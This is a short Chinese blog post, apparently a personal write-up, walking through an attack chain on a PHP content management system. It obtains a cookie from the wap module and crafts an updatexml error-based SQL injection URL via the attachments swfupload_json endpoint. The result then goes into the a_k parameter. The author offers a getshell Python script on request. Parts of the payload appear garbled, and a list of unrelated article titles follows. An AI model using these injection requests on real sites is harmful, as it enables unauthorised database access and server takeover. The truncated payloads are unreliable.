弄了3天了  这个点 总结一下这三天的坑吧

0X01 注入点入手

/index.php?m=wap&c=index&a=init&siteid=1  获取cookie

传给

userid_flash=686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4

然后 构造SQL语句

/index.php?m=attachment&c=attachments&a=swfupload_json&aid=&src=%26id=%*+and+updatexml(%2cconcat(%2c((select+@@datadir+limit+%2c1)))%2c1)%%26m%3d1%26f%3dhaha%26modelid%3d2%26catid%3d7%

得到cookie

在构造传给a_k参数

/index.php?m=content&c=down&a_k=

2前台getshell附件在我的机器里面 要得可以私信我 py脚本

太菜了 多学习

最新文章

1. linux sed命令详解
2. DSY3163*Eden的新背包问题
3. [django]django xlrd处理xls中日期转换问题
4. javascript学习之带滚动条的图片
5. iOS开发 － OC － 苹果为大家提供的后台：CloudKit 的简单使用
6. 2014Ember带来怎样的变化？
7. 【Unity Shaders】学习笔记——SurfaceShader（十）镜面反射
8. Tutorial: Model
9. Java流操作之转换流
10. ETL构建数据仓库五步法
11. 习WebSocket一（WebSocket初识）[转]
12. Transparent Application Failover 透明应用切换
13. Python实战之SocketServer模块
14. Konckout第四个实例：组合类型数据绑定 -- 日期双向绑定显示
15. 1082. Read Number in Chinese (25)
16. input date 赋值的坑及改变时如何获取 input date的值
17. SpringMVC框架二：SpringMVC与MyBatis整合
18. webstrom 使用sass的环境配置说明
19. linux 逆向映射机制浅析
20. [No0000E6]C# 判断与循环

热门文章

1. [转载]java的传值和传引用
2. vue axios异步请求django
3. Redis之淘汰策略
4. Json-server在Vue 2.0中使用--build文件中没有dev-server文件
5. javascript&jquery方法比对
6. 深入学习Mybatis框架（一）- 入门
7. apk 查看sha1签名
8. MySQL介绍及安装环境配置
9. linux基础—课堂随笔07_磁盘存储和文件系统
10. RabbitMQ各种交换机类型Exchange Types介绍